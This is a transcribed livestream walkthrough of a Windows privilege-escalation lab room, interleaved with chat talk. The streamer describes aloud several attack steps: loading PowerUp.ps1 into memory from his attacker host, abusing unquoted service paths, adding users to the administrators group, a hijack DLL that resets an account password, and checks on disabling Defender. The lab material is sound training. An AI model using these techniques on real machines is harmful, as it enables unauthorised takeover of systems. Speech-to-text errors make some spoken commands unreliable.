welcome back. We're gonna be looking at more Windows Priv-esque stuff. So, we're gonna start this guy. Probably should have started him before I started the stream, but you know, I'm not that smart. But we're gonna keep looking at some more Windows Priv-esque stuff. And yeah, we'll go ahead and we'll throw it into this guy over here. See what we can do with it. See if we can have some fun with it. I put some new chat commands in the thing. So, I want to see if those actually work. Let's see here. Hey Sharma, how you doing? Let's see if some of these commands actually work. Let's try this one. Let's try that. Can we do that like right there? Oh my god, it works. Don't want me, Shara. Just going to tell you now. Oh, it says Nightbot though. It doesn't say. I wonder how I get to say the user. I'm gonna have to play with that. See how it actually make it say the user. Say like Overgrown-1 did this or whatever. Not Nightbot. All right. Let's do some of this stuff in here. Let's see if we can ping this box chat. I don't know if we can even ping him. I don't know if he's pingable. But let's see what we got here. We're just going to CD in the desktop, try activate. We're just going to keep with Windows Priv-esque. Even though that was the arena, this one's just going to be another part of it. If you think you are bad, I mean... Gee. If you are, that would be awesome. If you are. Where do you live? Where you at? Haven't seen you in a while. Alright, so... So do a ping on that box like right there. See if we can get a ping back. I don't know. What's this place? A few miles drops it. I think Peter's there. Surf City. Surf City is one. Surf City. My wife and I have been talking about houses where we get back to America. We're looking around like the North Carolina beach area, you know, like Topsail, Surf City, that area, stuff like that. She's just asking where one of my buddies lived at. I'm pretty sure he lives in Surf City. But the housing market right now is freaking absolutely insane. And you know, I'm going to retire from the Marine Corps, so I obviously need to get a job or something. Let's see if we can run an nmap scan this guy without trying to see if we can do an nmap tac p. Tac p tac. Let's just throw that whole thing in there for this IP address like right here. Maybe he's not pingable. It might be up, not pingable, but it is a Windows box. So, oh no, 3389 is up and running. So do we have any credentials to get in this guy? How are we gonna get in? Information gathering. Yeah, we definitely need to know who am I. I'll tell you that much. Do we have any credentials in here? Not seeing any. Ah, there we go. User password 1. Let's go. We're hacking it up already. Look at that, huh? Let's go ahead and do let's try an R desktop. A little bit slower, but it does work a little bit better for streaming at least, because then you know, you guys get more view of the whole screen rather than Remina, where it's a very small view. If yes, use the TAC V option. Okay, TAC V, I guess. I don't know. Well, that didn't help out at all. What we got here? What does it say? Credit speed required by server check servers disabled OTLS versions. If yes, use the TAC V option. So what is the capital V option? I figured it would, you know. I figured I could just use that. You're telling me to use it. Oh, defaults to negotiation. I guess 1.0. We'll try that. That thing? No, okay, let's try 1.1. Certificate is not trusted by the user to trust a specific certificate. Can we like no certificate or whatever? Can we do something like that with our desktop? This is gonna be the hardest part of the whole box, isn't it? Doing our desktop with it instead of just Remina. Disable encryption. Ah, the French. That was for French top secret. That's what that means. Just kidding. Disable. Let's see. Let's try grep for it. Let's do it. Our desktop. our desktop, contact help. Is that a thing? Yes, it is. Grep for certificate. Cert. That kind of sucked. Well, I'll just tack H. Grep for cert. Okay, so that's not really grep for now, is it? Might be using remnant on this guy. Let's try 4. Let's try attack 4 on here. Yeah, that didn't work. Okay. I wonder, you know what? Wonder if 5095 is open. Mmap tac P 5985. Tac PN. And we'll do it for that guy. 5985 is open. Then we have WinRM. And it's filtered. If you're making a box, a remote desktop is open, just open WinRM. Alright. We don't need to remotely desktop into it. You just open WinRM. And it works faster. Alright, well, it looks like we are going to be using Remina. And we'll do it for this IP address like right here. And it's user password 1. Hopefully this works. Minimize out of there. Boom, yes. User PASSWGRD 1. That was a capital P also, I believe. Alright, there we go. Let's try to get at least a little bit bigger for you guys. That should be pretty good. And we'll go from here. Let's go. Alright. Awesome. Oh, remote mouse. There we go. The Foxit reader. Yes, yes. Now let's open up PowerShell. And let's try to start doing some different things to it. I'm going to type in host name. Who am I? We already saw schema PC. Obviously, we saw that when we very first remote desktop into something that shows that. That is one thing that I do like to do is whenever I'm whenever I'm see remote desktop open, I do like to just use a remino, then go to it like real quick and see what the name of that machine is. So if I don't have any credentials or anything like that, at least get a name off of it, because you might be able to use that for things like Impacket, Rubius, things like that. You might have to need the name, or from that name you can usually figure out what the domain name is also. That's just something I like to do. So let's go ahead. Let's see what this guy wants us to do here. So very first thing is, now remember I did already do all these. The voice was messed up for them. So if you're watching on Twitch and you're like, all the answers are filled out, or on YouTube and you're like, you didn't do this black box style. It's because I did already do these, just the voice did not come through on YouTube. So it was either OBS, my fault, YouTube's fault, something happened. So it says list users on target system. So let's go ahead and do a net user. And there we go. We got some users there, okay? We can also do like a net local group, administrators, and see who belongs in the administrators group. We have admin and administrator. You can also type in net local group and see what groups are on here, right? Which these are just the groups that usually exist, right? We say remote desktop users, net local group, remote desktop users. This might help us out with something. And user is the only remote desktop user. Okay, now I don't know if administrator group falls within the remote desktop users. Usually I like to add them in there also, but that's what's showing like right there. What is the OS version of the target machine? So I think we can get that with sysinfo, right? Let's go with command prompt, try sysinfo. Is it sys space info? Let's go back into PowerShell and we'll do a sys space info. Try to figure that one out like right there. Oh, sysinfo. System info. What was I thinking? There we go. This is also going to load the hotfix information for us too. So we can also see that. So one of the questions is about hotfix, but system info. So it's asking us what the was the OS version. What's up, sweetheart? Yeah. Yes, you can grab a snack. All right, what is the OS version? All right, so there we go. Our OS version's right there. Awesome, easy day, right? I should actually be putting this kind of stuff in here, shouldn't I? So let's do a system or a system info. Let's go ahead and actually put this guy all the way up at the very top. right there, and we'll just say, hey, there's a system info for us, right? Bam. There we go. Okay. Let's see what's next. Oh. So we have one with security update for that. So I believe we can type in hotfix, can't we? Isn't it like get hotfix or something like that? I always figure how to do this part. I always figure how to look up what fixes were actually on something. User's host name. I always forget this. Hotfix ID. We could go like that for the patch level, but there's a way, very easy way to get the hotfixes within PowerShell. How to look up hotfixes in PowerShell. Get tac hotfix. Okay, what was I thinking? Get tac hotfix. Nope. Hotfix. Alright. And that will give us a lot of information about the hotfixes, like right there. I always forget that command. So we can look through here, figure out when it was, which one they actually want to see, the date and everything like that, installed on, whatever else. Okay, we can look like that, right? And also who was installed by and everything, obviously. Alright. System info, we can actually do this, hotfix. Alright, so there we go. There's that guy right there. So far we have not loaded in any tools yet also. This is all just Windows by itself. What is the state of Windows Defender? Okay, we should be able to do a command prompt and then sc query when defend. Is it like that? Yep, and that is stopped. Okay, so go ahead and grab that like right there. Sc query when defend, and that's going to show us that Windows Defender is stopped. We can also do we can go into PowerShell, and to see if real-time monitoring is on, we can go to a get MP preference, and then we can say disable real-time monitoring. I think it's like that. Get MP preference. I always forget this next part. Oh, we should probably put tac in there. We'll see what it wants us to give it. I might say name or something like that. Throttle limit, as job, verbose, debug, warning action. You're welcome. I always forget this one too. Get MP preference. We say enter. It's probably gonna say no. Oh, well there we go. Okay. Get MP preference, and we can look up disabled real-time monitoring, and that is false. So it is it's running, because if it's true, that means that's not running. Because if we change it to true, although he probably can't do it, set MP preference. He probably can't do it this user, but disable, or is it tac? Should be, oh wait, no, it's disable real-time monitoring. That's what it is. It's a tac, and then it disable real-time monitoring. If we were to change that to true, now we disabled it, but this user most likely cannot do it. So we can do a get MP preference for get MP preference. For some reason it's being weird. Get MP preference for disable real-time monitoring. I think we can do it like that, maybe not. Monitoring. See if we can do it like that. Okay, we cannot. Okay. I know there's a way just to be able to just look at that, but we can also type in get MP preference, and that'll show us everything too. And then you can try to disable from there. Obviously, this user, as a low privileged user, cannot do that. Once we start to increase our privileges, we may be able to. So let me just go ahead and do a hotfix. Oh, we gotta do a Windows Defender, and then we also had in there MP preference. Get MP preference. There we go. Let's go ahead and paste that in there. Then we'll grab that Windows Defender command I put in for the query to see if that's up and running, and it's obviously not up and running at this time. That is stopped. All right, cool. So what is next? Tools of the trade. I think all right, so we got some task files here. I don't know if we actually need to download them or not. We got, looks like Windows exploit suggester. Let's see what's in there. So let's see what's in these task files like right here. Try Acme Win Priv tools. We're going to try it without it. How about that? We're not going to download them. We're going to do it without it. Vulnerable software. So we do have to stop the machine. This is one thing I do remember from this machine is that every time you go into like a new area of it, you have to stop it and restart it. So the last one that we did, obviously you just go through the whole thing. All right, but every time you had to, log out, log back in, and then at one point I did have to terminate it, remember? But this time we have to actually terminate every single time and hop back into it. So we will get a new IP address every single time we terminate it, which may make this box a little bit longer. We're going to have to wait a few minutes every single time for this guy to actually show up. And for him to start getting up and running and things like that. So this may take a minute to actually doing everything, but we shall see. But yeah, did put some new stuff in the little bot thing there. If you guys want to see anything, let me know. I'm on Nightbot now. I'm Nightbotting it up. All right, I can type in this now too. All right, watch this. Oh, it worked. Whoop, whoop. I don't know why the rest of them don't work, but that one worked, whatever. I don't know why YouTube looks like that either. Hey, you know what? Does what it does. Nightbot does what it wants to do, right? Alright. Use Alt to select recent messages sent by this user. Wow. Oh, it just did it again. Whoops. Whatever. Alright. So let's go ahead and see if this guy is actually started yet. We'll try a remote desktop into him again. Let's go ahead and do a airmon-ng. There we go. And we'll see if this guy's actually started up yet or not. Use a Windows machine, so it always takes a minute to start. How's everyone doing today? Sharma, how you doing today? Try our best. I already said you're doing okay. I'm just an asshole. I just keep asking the same questions. Accept certificate, yes, and we'll do user and then PASSW0RD 1 WORD, not 0. So used to doing the 0. Doing fine. Working on a room on Try Hack Me. What room are you working on? Let's stop this and just go do that. Screw it. Steel Mountain? I just made that up. I have no idea. You know what? Actually, I think I can see what room you're working on. Wait a minute. I think I'm... Dashboard. Can I see what room you're working on? No, I don't think so. Never mind. Back to here. Information gathering. We already did all that, didn't we? Oh, we did do the find string. I do want to throw this in there. Let's find string, like right here, because that like tries to find passwords and things like that. So let me just go ahead and open up command prompt like real quick. I'm going to open up PowerShell, then go into command prompt so the text is bigger. And let me try to do that. Whoops. See if there's anything in here about password. Whoa. Whoa. Whoa, that was a horrible idea. Stop. Stop. Don't ever do that again. What was that? Wow, that was a horrible idea. Find string password and start out text. Okay, stop. I just want to see what's up here. Just defending my dissertation. I just hope it gets approved on time. Dude, I had to pretty much redo like my whole thing. It was really annoying whenever I went through. And like they didn't approve me using other people quick enough, so I kind of got screwed over with it. Oh my god, it's so fast I can't even control C fast enough. Yeah, like the control C like doesn't like react fast enough. I just wanted to see what these yellow ones are up here. That's what I really want to see. But it just does this craziness like right here. Whoa, there we go. Okay, there we go. So that goes through and tries to find anything that has password in it, but that's kind of actually insane. 1password.exe. So it just goes through text files and sees if there's something that says password in there anywhere. User passwords too. What's that? But yeah. Probably nothing that we can. Oh, Windows Cortana. Yeah, we don't want to look in there. That looks like a something, doesn't it? Password, lock. What the heck that is, like right there. Oh, it's an app, I think. Cortana. I just want to kind of see what that was all about. Excess growth spurt vegetable. So you're gonna do your next username. So overgrown carrot, so everyone knows. Actually, I didn't pick that to be a weirdo or anything like that. When I very first got an Xbox, which obviously like years ago or whatever, I told Xbox just to pick a name for me, and that was the first name that I had, and I just thought that was absolutely hilarious. So I just kept that. I just thought it was hilarious. I was like, this is pretty funny. All right, so now we're gonna look at vulnerable software. Okay, so he's telling us just a SCQC remote mouse service. Now, obviously, if it was on someone's desktop, we want to look at it, see if we can restart it, see if there's anything all about it and stuff like that. It is great. It really is. I couldn't stop. When I very first saw it on Xbox, I was like, what is that? What is that? Like, what? That could be put in so many different ways, And I did think it was absolutely hilarious. But we obviously saw that. What is it now? I'm getting off track here. The remote mouse service on the desktop, right? So that would be something that I would actually SC query, remote mouse service. And we will see what's happening here, right? We can see that's running. It is stoppable. Okay, we can try to stop it, right? We can do an SC stop, remote mouse service, see if we can stop this. Because if we can stop it, then we may be able to do more with it, We'd have to kind of look at our permissions and everything with it and stuff. But if we could stop this, access is denied. So we cannot stop or start it. It is stoppable, pausable, and accept shutdown, but we can't, as the user that we are like right now, we can't do anything with that, right? We can't actually look at it. But that is something that, I would highly suggest you look into if you see something on their desktop, something in their downloads, documents folder, or something like that. I know so far, at least, all the tests that I've taken, it's usually just been sitting around their desktop. If anything's crazy, if they want you to see, it's usually just around the user's desktop, or like in the recycling bin, or I would say desktop recycling bin, or if you have remote desktop services, then look at the Internet Explorer and look at like favorites and look at their history, see what they've been searching for, things like that. So let's see what this says. At this point, you have a few options to find a possible privilege escalation exploit they can be used against software installed. So I don't think that's talking about this guy right here, remote mouse service. We could try to do a search exploit for it. Let's go ahead. Search exploit remote mouse. So we do have a remote mouse, arbitrary remote command execution. We try to read that. I don't know if that's the same thing that we saw in there, that remote mouse service, like right there. All right, so yeah, we're seeing unquoted service path, and we also have a arbitrary command execution. I'm going to go with remote code execution. I'm going to go with probably it's an unquoted service path. So let's try to see if we can actually get something on this machine that will actually run it. Let's go ahead and do PowerShell, and let's see if we have an IEX IWR on here. Look like we do. IEX IWR. Okay, if I could type. Okay. Okay, yep, it's asking for a URI stuff like that, so we do have it. Okay. So let's go ahead and I already have power up in here, right? So let's go ahead and try to use power up on this guy. So we'll do a Python 3m http.server. Let's go ahead and look up my IP address. I have config, right? It's going to be 10.13.26.184. So let's go ahead and do an IEX IWR. Remember, this is going to put it into memory. We're going to use basic parsing in case Internet Explorer has never been used before. That's just me using it all the time because I'm just used to it now. I'm working on Game Zone. I'm literally struggling with it a little bit. Make it through. Oh, okay. Game Zone, that's a good one. HTTP. We'll throw that into there. /PowerUp.ps1. Now remember, we are pulling this from a Linux system, so it is case sensitive. We're pulling it from Kali, so it is case sensitive. So we do have to do it like that. If we're pulling it from Windows, it's not case sensitive. So let's say this guy had Python on him. You were in another box. This guy could talk to him, right? Say you're trying to move through Active Directory or some of that. You make a Python server. It's not case sensitive at that point. if it's going from Windows to Windows or from Windows to Linux, but if it's going from Linux to Windows, it is case sensitive. So we have this power.ps1 now. Let's go ahead and do an invoke all checks. We'll see if he finds anything. So we do have that remote mouse service like right there. We do see that, right? With that power up, we have right service binary, service name, remote mouse service. Only problem is we cannot restart this service. So unless we were able to do something where maybe there's a DLL missing, or maybe if we could restart the entire machine, that might work. I don't know. But as of right now, we cannot restart that service. We also have this Fitbit service up here too, right? This Fitbit Connect, right? So right service binary, service name, Fitbit Connect. Okay, we have that guy up here, and most likely right here is right where the problem's at, right? But we do have a couple problems in here. Let's see what this guy wants us to do. So region RP, yep. What version of Fitbit application can you see installed? Okay, so now we got to start looking at Fitbit. It is an uncoded service path, right? So let's go ahead and take a look at Fitbit and see what we can find here. So it's in C program files x86 Fitbit Connect, right? And we also have this Foxit reader over here too. That's something else we might want to look at too. Let's go and type in go into the C drive or Fitbit Connect even. There we go. Let's go ahead and see what this guy's all about. Right click on him, more. We go to properties, open file location. That'll work. See if we get that same file location. Programs, Fitbit. What else do we have? Was that in C program files and everything, or is that somewhere else? That looks like it's somewhere else, huh? C program files, Fitbit Connect. Okay, cool. So we do have this. Let's go to, we can look at general. All right, start looking at information of it, right? Details. Trying to figure out where the service, like what previous versions, compatibility. Trying to figure out what how to get the service of this. Like what is it? Compatibility for the program. Previous versions, we don't have anything. Details isn't really giving us much now, is it? We set the folder path, things like that. Let's go ahead and go back into programs, right click. Properties on that guy. Sharing, security, previous version customized. So we're not seeing too much on here. And I don't remember how I actually got the to actually see what was actually running on it, or how to see that what like the version was, stuff like that. But he's doing a WMI product get name, so the output is not easy to read for WMI products. So we can go ahead and we can try something like that. You can see when pounds find anything useful. You can filter the output to obtain a cleaner output with that. Let's go ahead and do this. So let's go ahead and look at, we're going to just say in here, we can probably keep this system info, huh? Checking program files, checking software information. Let's go ahead and try something like that, like right there. Go ahead and throw that into, I believe we're still running PowerShell. Yeah, let's go ahead and pop back over to command prompt. We'll throw that into here. And this is probably going to take a minute to run. So you have to go through and look at everything. That's okay though. By a minute, like he's going to take a while to run. I wonder if there's another way to be able to do this command like right here. Yeah, I don't remember. Be careful, do some backward compatibility. This is software written for 32-bit system. 64-bit WMI product command may not return all installed programs. Okay. Actually, go ahead and actually take a little print screen of this guy right here also. So I did that in the last box. This guy's taking a minute to run. As the output of this command can be overwhelmingly, grep the output from running servers by any find string command. Find string is running, that's a good idea too. So we could actually see if it's running first, then maybe do a find string of running. So let's go ahead and do an SC query, probably Fitbit or something like that. SC query. Okay, so there's an SC query like right there. And we're looking for something with Fitbit, right? I don't know the exact service name of it. Or if we can actually do a find string with fit. I don't think we can do it like that. Find string like that, fit. Can we pipe in this? I don't know if we can pipe in C like that. Let's go ahead and scroll way up. See if we get anything. A, B, C, D, E, F, Fitbit Connect. There we go. So service name is Fitbit Connect. Like right there, right? Easy day, right? Thank you very much for the follow, DZ64. And we have that Fitbit Connect like right there. So that is our service that is running, right? So I'm just gonna go ahead and just do a little over in my notes over here. SC query will show all programs. We'll show all programs. There we can look for programs that were installed. Alright, there we go. Let's go ahead and, so we got that Fitbit Connect, right? That's what it's called, right? So let's go ahead and try to do maybe we can just find string as Fitbit Connect. You want to do that. And then we'll do a find string Fitbit Connect. Alright, so we do see that, yep, okay, so that did find that, okay. That was that guy right there, so we can see that he is running, but we still don't have a version number yet for him, right? That's okay. Let's go ahead and check to see if it's running. Let's do I wonder if we can do that, and then find string. We can probably do something like this, right? Then we'll do a find string Fitbit Connect. Try something like this maybe. He's taking a minute to run, even though we're only doing Fitbit Connect now. Connect. If you need more information on your service, simply use scqc command as below, which is the query that we've been doing. Displaying a few options if possible. Privilege exploration, we saw a few options, right? And it also asks us what is the version of Foxit Reader that is installed. Let's go ahead and try to figure that one out like real quick. The version of Foxit. Let's see if this thing gives us a version on here. Go ahead and go to properties. General. Let's see this guy. So he has Foxit Reader 9.0. So at least we can see that like right there. But it's obviously 9.0.1.049. Or if we go to advanced, we get more information about it. No. Details. Not really seeing much in there. Could have swore I did this before with like for Vim, it's that. Anyone know how to enable mouse mode on a running instance of tmux? I'm not good with tmux. I do not know. Man, that guy's taking a minute. Let's try to actually look up Foxit Reader. More open file location. See if we get more information in here, I guess. So just still seeing that 9.0. Let's go into the start menu. That's probably why. Let's go to this PC, C drive, program files, x86 I believe it was, right? Foxit software, Foxit Reader. Let's go ahead and look at the actual file location itself. Properties, 9.0 still. 9.0.1.1049. So we just went to the actual file location, its actual self, and found it like that. Let's go ahead and look at the same thing for Fitbit. Fitbit Connect. Let's see if we can find it in here. Because last time we were looking at the start menu, that's why. That was my fault. Details, we have 2.0.1.6782. So Maybe I'll do a search exploit for maybe Fitbit. Search exploit for Fitbit. We do have the Fitbit Connect service, uncoded service path, privilege escalation, and then we have the text file here, so we can go ahead and search exploit tag M, that text file right there. Let's go ahead and cat 404, and let's see here what we got here. We have a uncoded service path. Fitbit Connect installs a service with an uncoded service path running with system privileges. This can potentially allow an authorized but non-privileged local user to execute arbitrary code elevated privileges. A successful attempt will require the local attacker must insert an executable file in the path of the service upon service restart or system reboot. So let's go ahead and do that with the Fitbit one. So we could try to do it. Proof of concept SCQC Fitbit Connect. So it's called Fitbit Connect. And yes, it is unquoted. You see there's no quotation marks around that. So let's go ahead and see what we can do with this. Let's hop back over into my Windows terminal here. Now we do have power up running, right? So we can do another, nope, I do not anymore. Let's go ahead and go back into PowerShell. Okay, let's press up, yep. Let's go ahead and grab that power up.ps1 again. I do have a Python already up and running, remember. Now let's go ahead and do another invoke all checks. And we'll stop that. And we have our Fitbit Connect link right here. So that's the service name, right? So we can make an executable called Fitbit Connect. Or we can just try to do something like this. And I don't know if we can restart it or not. We're going to try at first just do something like this. Let's see if that works. So the service path is service.exe. That's what it's being called, okay? And here, I guess, we're going to call it service.exe. Let's go ahead and check out net user just to see. Okay, John is not in there. Let's go back to command prompt. sc stop Fitbit Connect. Let's see if we can do that. And we can. Okay, so we can stop it. Awesome. So now let's do an sc start Fitbit Connect. Now I'm not going to throw this into my notes because we do have plenty of things. Net user. So we should have hopefully just saw John there. We did not. Let's go ahead and hop back over to PowerShell. And we're going to do the same thing, but this time we're going to do an invoke service abuse. So this time we're going to type in invoke service abuse. Invoke service abuse. Service name is Fitbit Connect. Username, password, local group, command. We can say net user Ryan /add. We try something like that, right? Let's go ahead and put quotation marks around that though. And we can try to do an and. Try to do an and net local group administrators /add Ryan. Try something like that also. Let's go ahead and do that like real quick. Arrow modify the service Fitbit Connect, access to service Fitbit something, so it doesn't look like we can modify that service like that. Now we may be able to make a service.exe. What if we can actually do service name service.exe? That's not going to work, is it? Because we actually need the actual service name from up here, don't we? Whatever he tells us. Service name Fitbit Connect. What if we can make a service.exe? That was confusing because these two are together. And do it like that. Let's try to make a service.exe and throw it into Fitbit Connect like right there and see if that works. So let's see first off, can we put something in there? So let's cd into C program files x86 Fitbit Connect. Program files x86 Fitbit Connect. Let's just do an echo test. Let's see if we say something in there. Test.text. Access to the path is denied. Okay, so we don't have access to that path right now. That's still okay. I mean, we're still good. We found at least that privilege escalation like right there, right? There's that Fitbit Connect.exe file like right there. We may be able to do stuff with it, but we're not actually increasing our privileges like right here on this one now, are we? So we did have a couple more though, right? for uncoded service paths. We also have this WBA agent. Might be able to do something in there. Let's try this first. Access to the path, boom, boom, is denied. Okay, so we can't get to that path either. And then we had that remote mouse service one, which that may have actually worked for us. We don't know though. Okay. Service name, remote mouse service, service path, service.exe. We try this like right here. We know we can't restart it, but let's go ahead and do a shutdown /R, which is going to reboot the system. Access denied. Ooh, so I can't reboot the system, huh? Shutdown /R. I can't restart it? Nope. So looks like we're not really going to be able to do much with that because we can start and stop Fitbit Connect, but we can't actually put anything into that area like right there. So we need to be able to open that area up and actually be able to do something with it. And that's really what the problem is like right now. The only other thing I can think of with here is to do something with DLLs, which we did the other day. So, and we're actually about to do that, DLL hijacking. So let's go ahead and we will terminate this machine and we'll start up a new machine. Okay, that one seemed more like, instead of vulnerable software, we just didn't exploit yet. It was vulnerable, different things. Foxit reader, we didn't really check out that one now, did we? For search exploit. Foxit. Wow. Okay. So Foxit reader 9. So we have remote code execution and a buffer overflow, ASLR and depth bypass. So Foxit reader is pretty much just screwed, huh? And we have arbitrary code execution and remote code execution. So Foxit reader is pretty bad. Hydrate. Oh, I'm on a drink too. Oh. Got you. All right. Let's see here. Let's DLL hijacking. This one right here will probably going to increase our privileges, I would think. Create malicious DLL, blah, blah, blah. Okay. Yeah, this one right here, we're probably, I'm thinking that we're going to, increase our privileges for this one. So just like we did the other day, we are going to be compiling the DLL here. Okay. Now we could go back through and use the process monitor. I don't know if we can actually get to process monitor on this box or not. We'll see. But I'm not going to do that one because I have the DLL hijacking it right here. And we went through and we did that whole thing in here, right? But we'll go through it on this box in case you don't want to watch a whole nother video just to see it. We will go through it on this box. And we'll figure out what to do from there. Let's go ahead and grab that IP address and log back in, right? So Remina. We'll see if process monitor is working on here too. Sharma, next week I start my 24-hour hacking. We're gonna hack for 24 hours, I think. We'll be doing TJ Knowles OSCP list. I already downloaded a whole bunch of different boxes for it. And yeah, they're all pretty much on VulnHub. So it's going to be a huge Linux one, I guess, because they're all on VulnHub. But I don't know, maybe we'll throw some Active Directory in there also, but I would have to like create the Active Directory network or whatever. Or maybe do Holo again or something, you know? Go through that whole thing during the 24-hour hacking stream. Maybe do something like that. We'll see. Alright, so we're back into here. Okay, we're in a different box. See, everything's different inside of here. Alright. And let's go ahead and open this guy up. We'll go back into PowerShell. And I kind of want to see if we have a process monitor on here. Go ahead and open this up. See process. Process. Doesn't look like he has. Do we have Procmon? think I just broke it. I don't know what I did. But let's see if he's actually showing us if process monitor is on this box. We could always put process monitor on the box. Well, some of the Marine Corps we have 24-hour duties, and some places you're allowed to sleep, other ones you're not. Usually you're in places that you're not because the guy's an asshole, you know. So I don't know. I don't think it's really going to be that difficult. I guess we'll find out, huh? Especially with breaks and everything. I think the hardest part's gonna be sitting down for that long. Obviously, you have to take quite a few 5-minute break kind of thing. Get up, walk around. Obviously, I'm going to have to eat and stuff like that. But I'm not seeing process monitor on this box anywhere. I wonder if we can get out to the internet, if we can download it and actually run it, actually install it, or if this user's not allowed to install stuff. I do show process monitor in the other stream. But that's like this is like a 4-part series, so I don't remember exactly which one I show it in, but it is the one like where DLL hijacking should be at. Process monitor. See if this actually works. Or if I can go out to Kali and download it or something like that. Go out to web here and do process monitor. Download process monitor. There's only 3.3 megabytes, so I mean, we'll save that file. Let's go ahead and bring this over into, we'll move from downloads process monitor.zip to right here. Let's go ahead and see if we can do like a wget for that guy, and if we can actually install him. Wget HTTP. Let's do a use basic parsing. Use basic parsing HTTP 10.13.26.184 slash, I don't remember what the actual name of it was, where'd everything go, process monitor.zip, like OSCP practice, not for a long time for that. There we go. Tag out file, we'll just call that same exact thing. See if we can do that. Okay, so it looks like we can download it, right? We can download it. Let's go ahead and do a expand archive. Box just froze. Does it start to freeze now? What's going on here? Expand archive process monitor.zip, and we'll do a CD into process monitor.zip or process monitor, and let's go ahead and run that. I guess 64.exe. We'll try that one first. Procmon 64. See if we can run that. Yep, agree to sysinternals, admin account, and then Jack DLL admin. So we do need to know an admin account first, which we do not have. What is, okay, so use basic parsing. Now I like to use that all the time because on domain admins are not supposed to be allowed to utilize the internet. The internet should be shut down. Just like how we just try to get on. Now this box just might not be connected, but see, we shouldn't be able to use anything in here if we are on a domain controller or any type of anything like that, right? Now, what use basic parsing does is the very first time you open up Internet Explorer or like Edge or something like that, you know how like whenever you open it, it's like, oh, this is your first time. Would you like to import all this or do all this crap or do all that crap, right? Use basic parsing, what it does is it says, hey, you don't care if this is the first time it's ever been started or not. Just download the freaking file. That's pretty much what it's saying. It's telling you like, hey, I don't care. We're just going to download it. We're just going to freaking run it, whatever else. That's why I like to do it whenever I do an invoke web request, with invoke expression, invoke web request, and also with wgets. I always do use basic parsing. Let's actually see if I do a wget. Let's see if we can get the error. I've gotten the error before on streams and stuff like that. 10.13.26.184. Whoa. 10.13.26.184. Attack out file. We'll say it's procmon, whatever again. I might actually want to try to download something, huh? We'll say process monitor.zip. Let's try to re-download this. Let's see if this actually, hopefully it gives us the error. Then you can actually see what I'm talking about. Damn, it didn't. There are boxes out there where you'll get all of a sudden an error. and it'll say that I pretty much can't download it because Internet Explorer or whatever has not been launched or something like that. Use basic parsing bypasses that, so you don't have to worry about that. That's why I always just do it. I'm just so used to doing it now, it's like whatever. Okay, let's go ahead and look at, so we can't open up Process Monitor. That kind of sucks, because what we can do with Process Monitor, like I was showing you last night's stream, is we can actually, like, if we can say it ends with .dll, and the name of it or whatever is name not found, whatever it remarks or whatever is name not found, which then we'll see all the DLLs that are not found, which then if we find something that, oh, they installed this, we can most likely mess with it, right? That's what Process Monitor, we can use it for that. One of the things we can use it for. So let's hop back over into here, see what it actually wants to do. See, this is Process Monitor, like right here. See how we have name not found as a result? So if we can look up name not found, right? And you can filter out to only show .dll. From there, and it'll say like ends with .dll. And then you filter result as name not found. It'll show all the DLLs where the name is not found. So this guy wants us to create a malicious DLL file, right? So we can do that. That's an easy day. Okay, we can go ahead and copy this. Now, leaving aside the boilerplate parts, you can see this file will execute the whoami command.exe, right? We have system command.exe. It's going to execute whoami, and it's going to throw it into the ctemp dll.txt, right? It's going to save the output there. Okay. Now we can mess with that, and we can have it do something different, right? So pretty much what we're going to do is we have to make this hijack.dll, like right here, right? We're going to throw in the ctemp. If we look up here, that's like where it's supposed to be at, right? Ctemp. Actually, I actually show Process Monitor in my notes because then you get a better idea of what's actually happening here. No, I did not, because I've used it 100 times, so I didn't show it in my notes. But the Windows Priv Arena Process Monitor does work on there, so that is a place like where you can do process monitoring. All right, but yeah, and we actually do the same exact one too with this hijack.me.dll file. So we're going to grab this. Now we're not going to make a something that goes into whoami. What I want to do is I want to make a reverse shell, I'm thinking, or something like that. So we should be able to make a reverse shell. See how that whoami shows that, like right there. Once we start and stop service, let's see if we can even stop this service actually. Because if we go through this whole thing, we can't even stop service. That's gonna be kind of annoying. Okay, so sc start. Okay, so we can start and stop service. Let's go ahead and stop it. All right, and it stopped. Okay, so we can start and stop service. So that is one thing you want to check, because if you go through this whole thing, then all of a sudden you can't even start and stop service. You're going to be a little bit annoyed, you know. So I want to make a reverse shell maybe, but it definitely says login with Jack's account, new password you have set. Okay, so it's telling us to create a new password for Jack's account, right? So let's go ahead and do a net user and see what is Jack's account's name. Net user, and his name is Jack. All right, let's go ahead and we will grab from here. We will grab this whole thing. Say Control C, boom, boom, and let's go ahead and do a nano hijack me.dll. You know what? There's already one on here because of last stream, which has the same exact DLL file. So instead of system, we're going to run command.exe. That's cool and all. But what we're going to do is we are going to now run net user Jack. Then we're just going to give a new password. Okay, that's all. Jack's already on there. We don't need to add him. We don't need to do anything like that. We can just give him a new password. All right, and then that'll be it. Now, obviously, before we do that, we also want to do a net local group administrators. Let's see if Jack belongs to the administrators. He doesn't. So we could try to make it so Jack is also an administrator. So we could do something like, now I don't know if this and works. We were having problems with it the other day, but I think I only did one and, so we'll try an and. Net local group administrators. Administrators / add Jack. So we're going to try to add Jack in the administrators group also. And then if we're really going to go hardcore, we might as well do an and net local group remote desktop users add jack. Control X, yes, enter. Okay. So now we have that hijack me DLL, right? So now what we want to do is, I don't know why I just didn't hijack me.dll though, because I'm a freaking idiot, that's why. We have to save that whole thing as, we're going to go ahead and we're going to move hijack me.dll to Windows dll.c, okay? Because we have to compile it, right? So, and it's going to output as hijack me.dll. Once compiled, we need to move the hijack me. See, yep, we got that. And we've seen earlier in the application we target search for DLL named hijack me.dll. So that's what you should be named. Now, we did not see that earlier because we cannot run proc-mon on here, as far as we know at least, and we don't have administrator access on here yet. So maybe whenever we get that, I'll download proc-mon and we'll see why this actually works. Hijack me.dll. Alright, so we're going to go ahead and we're going to compile this guy. He's going to come over as hijack me.dll and he'll be ready to go. So thank you very much, Raku, something like that. Thank you very much. All right, for the file. For some reason my alert box isn't showing up anymore. Oh, it showed up. Never mind. I'm just a freaking idiot. Okay. So let's go ahead and hit enter there. And now we've compiled Windows DLL.c, which we can't Windows DLL.c. Remember, this is the guy right here. Okay. We compiled that into hijack me.dll. Now we need to get that hijack me.dll over into here, and it looked like it was going to be running in the temp folder, correct? So if we look at that process monitor that they show us here, it says C temp hijack me.dll. I know that's impossible for you to read. It's also impossible for me to read. Man, you guys really like me stretching. There's some like weird stretch thing going on here. Oh, sorry, headphone users. Frank really likes the 5-minute breaks. Sharma really likes to stretch. Raku came in and he was like, stretch now. Immediately. Alright. I'm gonna start getting up in like yoga pants and doing some like really weird stretches. Are you working 